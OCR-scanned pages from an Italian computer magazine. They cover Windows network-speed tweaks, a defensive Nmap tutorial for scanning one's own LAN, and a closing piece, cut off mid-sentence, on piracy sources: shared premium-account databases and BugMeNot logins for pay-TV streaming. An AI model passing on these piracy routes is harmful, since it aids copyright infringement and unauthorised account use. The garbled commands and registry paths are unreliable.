mo, attivandole, tutte le funzionalità che ri¬ 
guardano la pulizia della cache, la memo¬ 
rizzazione dei cookie e ogni altro aspetto re¬ 
lativo alla memorizzazione di dati e informa¬ 
zioni. Cosi come avviene per Internet Explo¬ 
rer, tutti i browser consentono di effettuare 
questo tipo di “pulizia" di primavera 


A COMPONENTI 
W AGGIUNTIVI INDIGESTi 

Le funzionalità dei browser di nuova ge¬ 
nerazione possono essere accresciute 
installando plug-in, pacchetti aggiuntivi, 
estensioni di vario genere. Succede però 
che tali componenti causino rallentamenti 
durante la navigazione su Internet. Ecco 
come disattivarti. 

In Internet Explorer, per disabilitare un plug 
in, andiamo nel menu Strumenti/Opzioni 
Internet e spostiamoci nella scheda Pro¬ 
grammi. cliccando sulla voce Componen¬ 
ti aggiuntivi possiamo selezionare uno per 
uno i plug-in, magari installati per sbaglio, 
che lo rallentano e decidere se disattivarli 
Questo tipo di operazione dovrebbe allegge- 

I re il browser, ma attenzione a non rimun¬ 
era componenti utili! 


r\ MODIFICARE 
v-/ IL COMPOUND TCP 

I sistemi operativi Windows più recenti 
consentono di intervenire su parametri 
legati alla velocità di navigazione in Rete. 
Uno tra i tanti sui quali sì può agire prende 
il nome di Compound TCP. 

Su Wikipedia, al link www. winmagazine. it/ 
link/1927 possiamo trovare un articolo con 
tutte le istruzioni per ottimizzare il protocollo ► 


Speciali Win Magazine 51 

































































di comunicazione TCP usato dal nostro com¬ 
puter per inviare e ricevere i dati. Prima e 
dopo di ogni modifica, è buona norma ese¬ 
guire un test di velocità! 


Enabled con disabledìa funzione viene nuo¬ 
vamente disabilitata, mentre usando la vo¬ 
ce default si ritorna all'impostazione pre¬ 
definita di sistema. 


QUESTIONE 01 CACHE 

Su Windows 7 è possibile interve¬ 
nire su un parametro che indica al nostro 
sistema quanto e come accedere alla me¬ 
moria locale (cache) rispetto ai dati sca¬ 
ricati di volta in volta dal Web. Attivando 
tale operazione si dovrebbe riscontrare un 
significativo aumento di velocità mentre 
si naviga. 



Quando si modificano le impostazioni di 
rete molto spesso si finisce per sovraccari¬ 
care la CPU. Poiché alcune delle risorse del 
computer sono condivise tra il processore 
del computer e quello della scheda di rete, 
è opportuno ottimizzare le prestazioni di 
entrambi. 

Per farlo occorre abilitare una sorta di con¬ 
trollore della CPU. il chimney. Dalla finestra 
del prompt di DOS attiviamo tale operazione 
digitando la stringa netsh int tcp setglobal 
chimney=enabled Sostituendo enabled cm 
disabled potremo disabilitare questa voce 
di controllo del computer. 
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Per farlo, andiamo nel menu Start, digitima 
cmd e premiamo Invio. Quando compare 
il prompt di DOS digitiamo la riga di codi¬ 
ce netsh mt tcp set global dca=enabled. 
Sostituendo enabled con disabied potremo 
ritornare alla situazione precedente senza 
troppi problemi ' 

O EVITIAMO 
LE CONGESTIONI 

Se la connessione si blocca per qualche 
secondo per poi ripartire proprio mentre 
stiamo scaricando un file di grandi di¬ 
mensioni, possiamo provare a risolvere il 
problema abilitando una funzionalità poco 
nota di Windows 7: l’Explicit Congestion 
Notification. 

Questa funzionalità permette al sistema 
di non perdere pacchetti di dati quando 
se ne stanno gestendo "troppi" insieme. 
Per attivarla, dalla finestra di DOS occor¬ 
re digitare la stringa netsh int tcp set glo¬ 
bal ecncapability=enabled Sostituendo 


O DISABILITARE 
IL THR07TUNG 

Il throttling è una funzionalità di Windows 
abilitata automaticamente dal sistema che 
blocca il traffico di rete quando il tempo 
necessario per gestire i pacchetti risulta 
troppo elevato, fi volte, parò, l’attesa non 
dipende da un nostro problema di confi¬ 
gurazione, ma dalia lentezza dei server 
che ospita i siti, i servizm documep 
che stiamo scaricando. 
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Per evitare questo blocco,che di fatto ren¬ 
de impossibile navigare in alcuni siti Inter¬ 
net, apriamo il registro di Windows, andan¬ 
do nel menu Start/Esegui, digitando rege- 
dite premendo Invio. Raggiungiamo il per¬ 
corso HKEY_LOCAL_ MACHINE\SYSTEM\ 
CurrentControlSet\services\LanmanSer- 
veAParameterse creiamo una voce DWORD 
con nome Disable Bandwidth Throttling e 
assegniamole il valore 1. Testiamo i risulta¬ 
ti e nmuoviamo la voce nel caso non ci fos¬ 
sero benefici. 


O ST0P 

AL REGISTRO TCP 

Anche se dal punto di vista diagnostico 
tenere un diario aggiornato di tutte le con¬ 
nessioni ed eventuali problemi riscontrati 
può essere utile, per farlo con il sistema 
di connessione TCP il nostro computer 
richiede parecchie risorse che possono 
essere liberate introducendo una nuova 
chiave di registro DWORD. 



Per disabilitare la scrittura del registro e ve¬ 
locizzare le connessioni apriamo il registro di 
Windows, raggiungiamo il percorso HKEY 
LOCALMACHINE\SYSTEM\CurrentCon- 
trolSet\services\LanmanServer\Parame- 
ters. creiamo la voce EnableWsd con va¬ 
lore associato 0 (di base la registrazione è 
attiva, il valore One forza la disattivazione). 

O GESTIAMO LA CACHE 

Per migliorare Ip prestazioni le¬ 
gate alla velocità di navigazione Internet 
possiamo agire sulla cache e aggiungere 
«provare tre distinte chiavi di registro. 



Le tre voci DWORD da aggiungere sono Fi- 
lelnfoCacheEntriesMax, il cui valore deve 
essere incrementato rispetto a quello di de- 
fault utilizzando come valore 64 Directory- 
CacheEntriesMax che deve essere testato 
con valore uguale a 16. e per finire la voce 
FileNotFoundCacheEntriesMax con valore 
di prova pari a 128. Qualora queste confi¬ 
gurazioni non portassero beneficio si pos 
sono eliminare le chiavi aggiunte per ritor 
nare alla situazione originaria. 
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NAVIGARE SU INTERNET SENZA LIMITI! 

Ecco una serie di strumenti indispensabili per velocizzare e ottimizzare la propria connessione. Tutti i software citati nella tabella 
e tanti altri sono presenti nella sezione Speciali del Win CD-DVD-Rom. 


NMAP 

E uno scanner di rete che, analizzando lo 
stato delle porte su un computer bersaglio 
o un gruppo di indirizzi IP, permette di 
individuare dispositivi e servizi attivi 
all'internodiunalAN, 


SIMPLE PORT FORWARDING 

Un pratico tool per aprire direttamente 
le porte del router per lo scambio dati 
(necessario, ad esempio, per scaricare 
velocemente con i programmi P2P o avere 
un IO alto con eMule) senza mettere mano 
alle configurazioni del dispositi' 


NETSPEEDMONITOR 

Attraverso una piccola icona che si instal¬ 
la nella barra di Windows, guesto program¬ 
ma ci permette di monitorare la velocità 
della connessione di rete e la quantità di 
dati scambiati. 


COMPLETE INTERNET REPAIR 

Utile per risolvere tutti i problemi di connessione della 
nostra ADSL. Consente di resettare il protocollo internet 
(TCP/IP), riparare il Wnsock, ripulire la cache DNS, mettere 
a punto i protocolli SSL/HTTPS e ripristinare i file di host 
predelìnili. 



ADSL a tutta 

jsgps.-^ 



TOR BROWSER 

Consente di navigare in maniera totalmente 
anonima perché non solo è in grado di 
nascondere il nostro indirizzo IP, ma anche di 
mascherare il traffico Internet generato dal 
browser stesso. 


ULTRASURF 

Permette di navigare su Internet in modo 
completamente sicuro e anonimo. Utile anche 
per aggirare le restrizioni imposte 
dai portali di streaming. 


DOWNLOAD ACCELERATOR PLUS 

È un software per la gestione dei download 
che verifica la presenza del file da scaricare 
su più mirrar in modo da effettuare una 
connessione multiserver e ottimizzare le 
connessioni dial-up o broadband. Recuperai 
download interrotti e si integra perfettamente 
nei più usati browser. 


AUSLOGICS INTERNET OPTIMIZER 

ito software analizza a fondo lo stato della 
nostra connessione Internet e provvede ad 
ottimizzarla. Qualora le modifiche non apportassero 
i miglioramenti desiderati, inoltre, si può sempre 
tornare Indietro in un clic. 


HTTPWATCH BASIC EDITION 

Permette di visualizzare, monitorare e analizzare il traffico 
di Rete. Grazie ad HttpWatch saremo infatti in grado 
di analizzare in dettaglio le prestazioni di un sito Web, 
recuperando facilmente le informazioni su header, cookie, 
stato del codice, compressione e contenuti. 



DROPBOX ” • 

Mette a disposizione uno spi 
re file. Il suo funzionamento è 
su un PC verrà copiata su un server DrìJpbox e da li trasferita sul 
le macchine in nostro possesso in modo che ovunque si abbia la 
stessa versione dei documenti. 


rchiviareecondivide- 
"ogni modifica effettuata 


O OTTIMIZZARE 
LA LATENZA 

Per migliorare la velocità di connessione 
possiamo, oltre che agire su configurazioni 
della scheda di rete e chiavi di registro 
che riguardano direttamente la velocità 
di trasferimento dati, anche sulla latenza, 
ovvero il tempo necessario per avviare una 
connessione dati. 

Questi parametri sono integrabili raggiungendo 
il blocco di chiavi di registro HKEY LOCAL _ MA- 
CHINE\SYSTEM\CurrentControlSet\services\ 
Tcpip\Parameters\lntertaces Tra i sottogruppi 
presenti, selezioniamo quello ai cui interno esi¬ 
stono le voci che riportano il nostro IP di mac¬ 
china locale. Dopo aver raggiunto questo per¬ 
corso, possiamo procedere ad aggiungere due 
diverse voci di formato DWORD La prima avrà 
come nome TcpAckFrequencye dovrà essere 


configurata con un valore esadecimale paria 7. 
mentre la seconda voce si chiamerà TCPNoDe- 
laye anche a questa dovrà essere assegnato 
come valore 1 Facciamo attenzione ad inseri¬ 
re correttamente le voci rispettando maiuscolo 
e minuscole ed effettuiamo qualche test di ve¬ 
locità, dopo il riawio. per capire se siamo riu¬ 
sciti a ridurre il tempo di ping 


o 


SETTAGGI AVANZATI 
PER I BROWSER 


Se usiamo un browser come Google Chro- 
me probabilmente stiamo già sfruttando 
al meglio tutte le caratteristiche del Web. 
Nel caso invece usassimo Internet Explorer 
o Firefox è possibile intervenire e testare 
alcune modifiche. 

In particolare, se abbiamo Windows 7 nel gruppo 


di registro HKEY_LOCAL _ MACHINBSOFTWA - 
RE\Microsoft\lntemet ExplorePMAIN\Feature- 
Contr ori possiamo inserire la chiave DWORD FE- 
A TURE_ MAXCONNECTIONSPER1 _ OSERVER\ 
explorer.exe con valore uguale a 8 mentre su 
Firefox. digitando about:config nella barra di na¬ 
vigazione, potremo intervenire su una serie di 
configurazioni tra cui nglayout.initialpaint.de- 
/ay che andrebbe ridotto a meno di 50 
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al sicuro 


tua LAN 


Testiamo la rete evidenziandone 
tutte le vulnerabilità, prima che 
siano sfruttate dai pirati. Si fa così 


Cosa ci 
occorre 


TOOL DIAGNOSTICA 
DIRETE 

NMAP 

lo trovi «CO 

Sito Internet; 

àtu_✓ 


ASCOLTIAMO 


GLI ESPERTI 

Quando le porte aperte 
non riconducono a una 
frettolosa ocattiva con¬ 
figurazione del sistema 
da parte dell'utente, 
ma sono invece il frutto 
dell'azione di un qualche 
tipo di malware (virus, 
trojan ecc.j, l'operazione 
di messa in sicurezza pò 
trebbe rivelarsi più com¬ 
plessa e richiedere, in 
taluni casi, perfino una 
completa reinstallazione 
del sistema operativo. 

In tale frangente, consi¬ 
derando la molteplicità 
dei possibili scenari, 
l'approccio consigliato è 
quello di ricercare infor¬ 
mazioni di "prima mano" 
su Internet purché, ov¬ 
viamente, le fonti siano 
affidabili (Sans, www. 
sans.org, Symantec, 
wwvr -syrnanlec.it, ecc.), 
altrimenti il rimedio po¬ 
trebbe rivelarsi peggiore 
del male. 


S ebbene i canonici strumenti di difesa dagli 
attacchi informatici tipicamente utilizzali 
sui nostri computero nelle reti locali (in 
primis, i firewall) offrano in molti casi una ade¬ 
guata protezione verso le insidie provenienti 
dall'esterno. ìi doveroso evidenziare che, in 
talune circostanze, l’utilizzo di questi strumenti 
potrebbe rivelarsi inefficace nel segnalare alcu¬ 
ni tipi di minacce potenzialmente pericolose, 
delle vulnerabilità che se non tempestivamente 
sanate potrebbero consentire a un attaccante 
remoto di compiere un certo numero di opera¬ 
zioni illegittime sui nostri sistemi. 

di vulnerabilità 

potrebbe concretizzarsi sia a 
intrinseco al sistema di pro¬ 
tezione impiegato, sia in seguito a un'altera¬ 
zione di quest'ultimo dovuta all'involontaria 
esecuzione di un software in grado di veicolare 
agenti malevoli come, per esempio, un virus, 
un trojan o una backdoor. Per queste ragioni, 
è opportuno integrare i normali software di 
protezione (firewall, antivirus ecc.)con dei pe¬ 
riodici coni rolli della macchina/rete, controlli 
effettuali secondo un differente approccio del 
tutto immune al tipo di compromissione appena 
citata, il panorama informatico odierno, a tal 
proposito, offre una vasta gamma di strumenti 
pensati per compiere questo tipo di attività, 
un’operazione che in letteratura informatica 
prende il nome di network exploration o au¬ 
diting. Si tratta di strumenti software in grado 
di analizzare da remoto, in modo rapido ed 
efficace, sia una singola macchina, sia un'intera 
rete informatica, anche di grandi dimensioni. 
Lo scopo di tale operazione è quello di fornire 
quante più informazioni possibili sull'obiet¬ 
tivo desiderato, informazioni che possiedono 
una doppia valenza, in quanto estremamente 
preziose sia agli utenti/amministratori per ve¬ 
rificare la sicurezza della propria macchina/ 




















Installiamo ciò che serve 

Le prime versioni di Nmap non disponevano di alcuna interfaccia grafica. Oggi è possibile imr 
di comando, sia, più semplicemente, mediante il suo front-end grafico Zenmap. Ecco come attivarlo. 



sia da riga 


om ipii 1 ■ 111 - ■ .”- t 

j 

x«' -4xc«t»v» 

•; 

’J" crrfr xpaa w**i,zfx*g 



© 


S** ihUMMpMMW HIT rn. 

imm «Sito yff * Ama J teli && 


!ESC *■*» 

*“•*, E) !*» 

Ot • 

( Mn 


Selezioniamo i componenti 

•| ; Awiamo l'installazione di Nmap eseguen- 
; do il (ile nmap-5.51-setup.exe (presente 
sul CD-Rom) e accettiamo le selezioni proposte, 
confermandole con la pressione del pulsante Next. 
installeremo così sia le componenti indispensabili, 
sia alcuni piccoli programmi di utilità.»^ 



^ Completiamo Tinstallazione 

2 t Al termine della procedura di installazione 
“ ! ci verrà richiesto se avviare il servizio di rete 
WinPcap e se farlo automaticamente ad ogni suc¬ 
cessivo riavvio del sistema operativo; accettiamo 
tutte le impostazioni predefinite confermandole con 
un clic sul pulsante Next 


^ Avviamo il programma 

^ i Avviamo l'interfaccia grafica di Nmap con un 
doppio clic sull'icona Nmap - Zenmap GUI 
presente sul Desktop. Nonostante si possa adoperare 
anche in modalità testuale, l'interfaccia grafica con¬ 
sente un uso immediato anche a coloro che lo avvia¬ 
no per la prima volta. 



a Tutto funziona oene 

Prima di impiegare effettivamente il software appena installato, effettuiamo una prima rapida verifica delle sue 
funzionalità, indicando come obiettivo delle interrogazioni la nostra macchina locale. 



Una verifica iniziale 

■f Per prendere confidenza con l’ambiente 
’’ J grafico di Nmap, rivolgiamo un'interroga¬ 
zione alla nostra macchina scrivendo 127.0.0.1 in 
Target, si tratta dell'indirizzo IP convenzionalmen¬ 
te assegnato alla macchina locale (per saperne di 
più, leggi il box Localhost: questo sconosciuteli. 


* I profili disponibili 

2 i La tipologia di interrogazioni eseguibili è ini- 
’.. ' zialmente limitata ad alcuni profili di attacco 
predefiniti presenti nella casella Profile Per effet¬ 
tuare la nostra prima interrogazione usiamo uno di 
questi profili. Intense Scan. che equivale a dare il 
comando testuale nmap -T4 -A -v 127.0.0.1 


a| Osserviamo i risultati 

2 Avviata l’interrogazione con il pulsante 
Scan. il riquadro destro mostrerà in tempo 
reale le informazioni ottenute sul Target indicato 
(in base al tab selezionato. Ports/Hosts. Topo- 
logy. Nmap Output ecc.), mentre quello sinistro 
consente la selezione dei target già interrogati. 


rete, sia ai malintenzionati che possono cosi 
sfruttare le vulnerabilità rilevate. Tra i software 
di questa categoria, quello che oggi "de facto” 
viene considerato lo standard da coloro che si 
occupano di sicurezza informatica (e, purtrop¬ 
po, anche per chi opera in direzione opposta) è 
certamente Nmap. 

Non aprite quella porta 

Contrazione dei termini network e mapper, 
esso è infatti da tempo divenuto il software di 


analisi per antonomasia, unasorta di coltellino 
svizzero multifunzione con il quale è possibile 
compiere un numero enorme di operazioni, 
talvolta anche molto sofisticate: inviando in 
rete dei pacchetti opportunamente forgiati, 
Nmap è in grado infatti di enumerare le risorse 
di una macchina/rete remota (elaboratori ed 
ogni dispositivo di rete presente), fornendo per 
ciascuna di esse un certo numero di informa¬ 
zioni come, per esempio, il tipo e la versione 
del sistema operativo impiegato e i servizi in 


esecuzione. Un altro elemento che caratterizza 
fortemente Nmap, differenziandolo dagli altri 
software che svolgono funzioni analoghe, è 
sicuramente la sua abilità nel compiere tantis¬ 
sime operazioni in tempi molto brevi, anche 
quando l’obiettivo sono centinaia di migliaia 
di macchine. Proprio per queste sue peculiarità 
Nmap si è conquistato il ruolo di strumento 
d elezione in ambito sicurezza, consentendo agli 
operatori una efficace verifica delle vulnerabilità 
alTinternodi una struttura di rete (attività che ► 


Speciali Win Magazine 55 


































V PC e Smartphone degli Hacker | Metti al sicuro la tua LAN 


3 Interroghiamo la rete 

Terminata la preliminare verifica del funzionamento di Nmap, vediamo come operare l'interrogazione della LAN, 
presupponendo che essa operi nell’intervallo di indirizzi IP compreso tra 192.168.1.1 e 192.168.1.254. 
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a Scegliamo l'obiettivo 

■| Per non violare la legge, rivolgiamo le inter- 
J- rogazioni verso le macchine della nostra 
LAN. Scriviamo 192.168.1.0/24 in Target per indi¬ 
care tutti gli indirizzi IP compresi tra 19B1M L 1 e 
192.168.1.254. Da Profile selezioni^M^lpr 
scane inseriamo l'opzione-v modificando irr 
192.168.1.0/24 il contenuto della casella Comi 



m Creiamo un nuovo profilo 

2 II parametro -^permette di ottenere ulterio- 
ri informazioni durante il funzionamento del 
programma. Per non riscrivere ogni volta da zero i 
comandi personalizzati, avvaliamoci della possibilità 
offerta da Nmap di creare nuovi profili. Scegliamo 
‘ile Editori menu Profile e creiamo un nuovo 
pwjÈtenprnirato, ad esempio, TestScan 


Osserviamo i risultati 

3 : Avviata l’interrogazione con il pulsan- 
— ' te Scan. il riquadro destro mostrerà in 
tempo reale le informazioni ottenute sul Tar¬ 
get indicato (in base al tab selezionato. Ports/ 
Hosts. Topology. Nmap Output eco.), mentre 
quello sinistro consente la selezione dei target 
già interrogati. 


prende il nome di penetration testing), prima 
che queste, magari evidenziate con lo stesso 
strumento, vengano sfruttate dai potenziali 
malintenzionati. Ribadendo il concetto che sia 
gli addetti alla sicurezza sia i malintenzionati 


hanno a disp»si«r<>i 
informatici, possia 
il risultato finale dipeliti? 
intervento: chi giunge per prie 
te il vincitore, buono o cat tivo che si! 


desimi strumenti 
evincere come 
tipi di 



PORTE DI COMUNICAZIONE: ECCO COME FUNZIO 

Quando due macchine comunicano tipo rigido solo per quel che concerne 
tra loro in una rete, devono esprimersi le prime 1024 porte, che prendono la 
attraverso un protocollo comune, cioè denominazione di WellKnown Services 


usare un linguaggio comprensibile ad 
entrambi. Il discorso si complica quando 
una di queste macchine offre più servi¬ 
zi (server) e l'altra desidera utilizzarne 
soltanto uno (Client): si tratta di uno 
scenario di tipo server/dient, dove oltre 
a impiegare un protocollo di comunica¬ 
zione comune, occorre individuare un 
metodo che consenta alla macchina 
Client di selezionare il tipo di servizio 
da fruire. La famiglia di protocolli TCP/ 
IP risolve questo problema impiegando 
un valoredi tipo numerico denominato 
porta: come avviene per gli indirizzi IP, 
un organo centrale operante a livel¬ 
lo mondiale (IANA: Internet Assigned 
Numbers Authority ) stabilisce i criteri 
per l’assegnazione dei numeri di que¬ 
ste porte. IANA pubblica un elenco 
standard dove sono riportate le corri¬ 
spondenze tra servizi e numeri di porta, 
elenco che prevede un'assegnazione di 


(servizi noti) o Privileged Ports (porte 
privilegiate). Questo metodo è in grado 
di risolvere efficacemente il problema, 
in quanto consente alle macchine dient 
di selezionare in modo univoco uno dei 
servizi resi disponibili da una macchi 
na server: ciò avviene in modo molto 
semplice, facendo seguire l'indirizzo IP 
di destinazione (quello del server) dal 
numero della porta desiderata. 

UN ESEMPIO PRATICO 

In figura viene mostrato il meccani¬ 
smo appena descrìtto: la porta usata 
sul server è la 80, che corrisponde al 
servizio HTTP (HyperText Transfer Pro¬ 
tocol). Un server rende disponibile i 
suoi servizi e si pone in ascolto (listen) 
sulle relative porte che, normalmente, 
sono eompresp tra quelle privilegiate 
Nell'esempio, il server offre tre ser¬ 
vizi : 80 HTTP, 23 TELNET, 21 FTP. Un 


client si connette al servizio i 
server tramite il browser), operando 
una sua porta non utilizzata da altri 
processi (di solito, una delle porte non 
privilegiate, quindi, oltre la 1024); in 
questo esempio il client sta utilizzan¬ 
do la porta 3000. Il protocollo TCP/IP 

Server 

FTP, Telnet e HTTP 


articolo vedremo come impiegare Nmap al fine 
di verificare la sicurezza della nostra macchina/ 
rete, in mododa poter correre immediatamente 
ai ripari, eliminando le vulnerabilità eventual- 
maBte rilevate. 


dispone di 6553S porte delle quali, 
convenzionalmente, quelle comprese 
nell'intervallo tra la porta 1024 e la 
porta 65535 sono dedicate ai processi 
di tipo client mentre, invece, quelle 
comprese tra 0 e 1023 sono dedicate 
ai processi di tipo server. 






FTP, Telnet e HTTP 
































Metti al sicuro la tua LAN 
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01 Ecco le vulnerabilità 

Una volta terminata rintenogazione delle macchine attive nella rete, dobbiamo interpretare 
opportunamente i risultati al fine di evidenziare eventuali vulnerabilità da sanare. 
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^ Osserviamo l'output 

1 L'interrogazione ha rilevato 4 macchine attive all'in¬ 
terno dell'intervallo di indirizzijpecificato e, nella fatti¬ 
specie. i computer facenti capo agli PJjrazi/P 192.168.1.69. 
192.168.1.100.192.168.1.104e iMlfàtf&Lm eviden 
ziati in giallo nella' sezione Host 


Il punto di accesso al Web 

2 • Nella stessa sezione è presente anche una quinta mac- 
—r, 7 china identificata da Nmap con degli asterischi prima 
dell'indirizzo IP 192.168.1.1: non si tratta di un computer, ma 
del Gateway verso l’esterno, cioè, tipicamente, del router utiliz¬ 
zato per connettersi alla rete Internet. 
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^ Analizziamo le informazioni 

3 | Selezioniamo la macchina 192.168.1.171 e analizziamo 
‘ le informazioni visualizzate. Le più importanti sono quelle 
relative alle porte open, le quali riconducono a uno o più servizi 
attivi sul computer “vittima" e che possono rappresentare una 
breccia nel sistema se mal configurati. 
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a Ecco le porte di accesso 

/J Vengono rilevate "aperte" le porte 739 e 445, che fan- 
! no capo al servizio di condivisione file di Windows, e 80 
e 443. relative a un server Web operante in modalità standard 
(porta 80) e sicura (porta 443). Se usiamo questi servizi non 
allarmiamoci, purché siano ben configurati 
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^ Servizi da disattivare 

g i Individuati i servizi attivi si procederà a verificarne la cor- 
-J retta configurazione (password, permessi ecc.) oppure, 
se non necessari, a disabilitarli. Per farlo, da Windows 7 digitia¬ 
mo servizi nella barra di ricerca del menu Start, selezioniamo 
Servizi tra i risultati e diamo Invio. 


Saniamo le vulnerabilità 

g - Nella schermata che appare individuiamo la voce Servi¬ 
zio Pubblicazione sul Web relativa al servizio di gestio¬ 
ne del server Web e selezioniamola col tasto destro del mou¬ 
se. Cucchiamo Proprietà e poi Disabilitato in Tipo di avvio per 
disattivare il servizio e risolvere la vulnerabilità 



LOCALHOST, 

CIUTO 

L'interfaccia denomi¬ 
nata "localhost'o "di 
loopbacfc" è una partico - 
lare interfaccia fittizia 
locale alla quale viene 
assegnata l'indirizzo IP 
fZT’.O.OJ: mediante es¬ 
sa* possibile effettuare 
numerosi test volti a 
verificare il buon fun¬ 
zionamento dei servizi 
di rete operanti con la 
famiglia di protocolli 
TCP/IP, usati per il col- 
legamento a Internet. 
Gli applicativi di rete 
possono impiegare tale 
interfaccia per stabilire 
delle connessioni tra 
loro, anche quando 
sulla macchina non è di¬ 
sponibile unlnterfaccia 
di rete’attiva. 

QUALI SONO 
GLI INDIRIZZI? 

Per individuare l'in¬ 
tervallo di indirizzi 
nel quale si trovano le 
macchine della nostra 
rete basta aprire II 
Prompt dei comandi 
(tipicamente in Start/ 
Programmi/Auesiori) 
ed eseguire il comando 
ipronUg: tra le infor¬ 
mazioni visualizzate 
occorrerà individuare 
quella relativa all'io 
dirizzo IP della Schedo 
fthtrnet (se si utilizza 
una connessione trami¬ 
te cavo) oppure della 
Sdieda LAN Wireless 
(per le connessioni 
senza fili). Nella casella 
Targetdi Nmap inseri¬ 
remo questo indirizzo 
sostituendo l'ultimo 
numero con uno zero e 
aggiungendo/^ (se la 
subnet mask indicata 
di seguito all'Indirizzo 
IP Ì255M5.255.0). 

Ad esempio, se l'indi¬ 
rizzo IP è 192.168.0. J2 
e la subnet mask 
255.255.255.0, scrive¬ 
remo 192.168.0.0/24. 
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sta una password | 


E tutto gratis, 

Sky, Mediaset Premium, giochi e software... 
c’è una chiave segreta per accedere a tutto! 

E c’è chi l’ha già trovata 



P ensando a Internet come ad un grande 
cervello, i vari utenti che popolano la 
Rete possono essere definiti come le si¬ 
napsi che lo collegano. La condivisione delle 
informazioni, infatti, è una delle migliori 
caratteristiche di Internet, ma cosi come per 
il cervello, i pensieri che ne scaturiscono a 
volte possono essere malvagi. Contempora- 
nea mente al materiale di superficie compo¬ 
sto da social network, notizie, articoli, video, 
e-com merce e quant altro, nel sottobosco d i 
Internet si celano miriadi di informazioni, 
codici e dati di login per svariati servizi 
on-line accessibili solo agli utenti più arguti 
e smaliziati. Il motivo per cui tali contenuti 
sono estremamente difficili da reperire va 
ricercato nella loro tipologia. Trattandosi 
d’informazioni che conducono prevalen¬ 
temente a contenuti fruibili solo dopo aver 
acquistato un abbonamento, coloro che le 
condividono si guardano bene da sbandie- 
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rarle ai quattro venti, confidando nel fatto 
che. anche se più difficili da reperire, gli 
utenti che non si fermano davanti a nulla 
avranno comunque la possibilità di rag¬ 
giungerle. In questo modo chi condivide 
questo genere d’informazioni corre meno 
rischi di imbattersi nella giustizia. 

L’edicola virtuale è chiusa 

Proprio nel momento in cui scriviamo, la 
Procura di Milano ha ordinato la chiusura 
'ti Avaxhome. l'edicola pirata più popolare 
d i '' eh, un sito con sede in Russia die 
c n.* ideva i link per scaricare eBook 
equotfdu u tt 10 lingue diverse. Tut¬ 
tavia, invc e cl e , tu re la parola fine 
alla vicenda, il,. v' d: entp è servito 
solamente a rallenti. re e attività degli 
scrocconi che hanno semplici utente 
adottato qualche accorgiinen > < piu 
per entrare nuovamente in posse so 
di riviste e quotidiani senza spendere 
un euro. Oppure sono andati a cercare 
altrove, visto che le risorse, anche se 
celate, non mancano di certo. 

Una giungla 
di virus e banner 

Facilmente reperibili anche a chi esper¬ 
to non lo è, i contenuti più diffusi sono gli 
stessi che i pirati si 
condividono fin da a a 
quando internet è * ' 

divenuto un mezzo ^ Procura di MUono chiude 
di massa: semmai a Avaxhome, l'edicola virtuale 
cambiare è il modo del Web. Ma ai pirati basta un 

in cui si propagano. proxy anonimo per... 

Crack per aggirare 
l’attivazione di pro¬ 
grammi commer¬ 
ciali e videogame si riescono a trovare con 
una semplice ricerca, ma mentre prima 
si ricorreva ai software P2P come e.VIule, 
ora si parte direttamente da (mogie o Ring. 

L'evoluzione del file sharing che ha sostituito 
la condivisione diretta tra utenti con l’uso 
dei file hosting, ha reso i motori di ricerca 
gli alleati migliori per riuscire ad adden¬ 


trarsi nel sottobosco del Web. Dalle pagine 
dei risultati gli utenti vengono collegati ai 
tanti forum c blog che pubblicano i link 
per il download della risorsa, ed è qui che 
s'incontrano le prime difficoltà. Nascosti 
tra decine di link che aprono altrettanti 
banner o iniettano nel PC software dannosi, 
i collegamenti per il download della risorsa 
sono difficili da individuare a un occhio 
poco allenato. Senza contare che spesso il 
file viene splittato in più parti ed è quindi 
necessario scaricarle tutte prima di poterne 
usufruire. Ad agevolare il compito ci sono 
i download manager, strumenti con cui i 
pirati hanno dato ampie dimostrazioni della 
loro enorme fantasia. 

Oltre il danno, la beffa 

Re indiscusso di questo genere di software, 
IDownloader permette ai pirati di prendere 
dur deconi con una fava. Già di per sé il sol- 
tv ,re propone il download automatizzato 
dei in,k che puntano alla quasi totalità dei 
servizi tii file hosting. Non contenti di ciò, i 
pirati si sono ingegnati su come condividere i 
cosiddetti account premium che consentono 
download multipli e .senza limiti a più utenti 
contemporaneamente, sfruttando la com¬ 
plicità di siti Web e forum compiacenti che 
condividono informazioni corrette. Tra que¬ 
sti, il più "diccaio” 
dai pirati nostrani è 
sicuramente Proget- 
hiano chiude to Super p rem ium 

ÌCOÌa virtuale Database JDownlo- 

urat! basta un ader (www.pròget- 

imo per... tospdjd i .biogspot. 

m m it), un blog all'appa- 

"" renza modesto do¬ 

ve quotidianamente 
vengono condivisi i database degli account 
premium. Nonostante la chiarezza delle 
informazioni, il download del database con 
tutti i link che permettono di scaricare i pac¬ 
chetti in cui èstato spezzettato il contenuto 
originale passa per una serie di scatole cinesi 
farcite da pubblicità e popup: ma una volta 
entrati in possesso di questi, l’inserimento 
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in JDownloader è semplice quanto la copia 
di un file. Va però precisato che il database 
non è sempre funzionante (magari perché 
bloccato dai legittimi detentori dei diritti 
d autore) e solo dopo lunghe ricerche si rie- 
scea trovare quello ancora valido. La fatica 
viene però ampiamente ripagata dai corposi 
download possibili con IDownloaderegli 
account premium contenuti nel database. 
Niente piò codici CAPTCHA, download 
multipli e nessun limite di dimensione o 
banda, insomma una vera goduria per gli 
scrocconi che, oltre a utilizzarli per sca¬ 
ricare video, software e giochi a sbafo, si 
appropriano dei privilegi che i file hosting 
dedicano agli account a pagamento senza 
sborsare il becco di un quattrinr ttna dop¬ 
pia beffa a dir poco geniale! 


Airarrembaggio 
w perVie 


della Pay per view 


Con la diffusione dei servizi on demand e 
lo sbarco sul Web dei contenuti trasmessi 
sulle piattaforme del digitale terrestre/satel¬ 
litare, I pirati hanno un nuovo e appetitoso 
botti no su cui in tanti vorrebbero mettere le 
mani. AccessihiIi solo agli utenti abbonati, 
i servizi Sky (io e Mediaset Premium Play 
permettono di accedere a molti contenuti 
in diretta anche da PC, smartphone e tablet. 
Oltre ai dati di Ioghi, i servizi concedono 
l'autorizzazione solo ai dispositivi registrati 
(al massimo 2) ed è certo che i pirati sono già 
al lavoro per trovare il metodo che gli con¬ 
senta di aggirare il limite. I forum popolati 


da questi geni informatici del male sono 
già invasi da informazioni al riguardo, ma 
il traguardo è ancora lontano. Al momen¬ 
to l’unico modo per accedere a Sky Co e 
Mediaset Premium Play senza un regolare 
abbonamento è quello di ricorrere al caro 
vecchio BugMeNot (www.bugmenot.com). 
È vero che serve tanta fortuna, ma un tenta¬ 
tivo non costa nulla, in fondo è sufficiente 
raggiungere il sito, inserire nella casella di 
ricerca presente nell’home page l’indiriz¬ 
zo Web del servizio in 
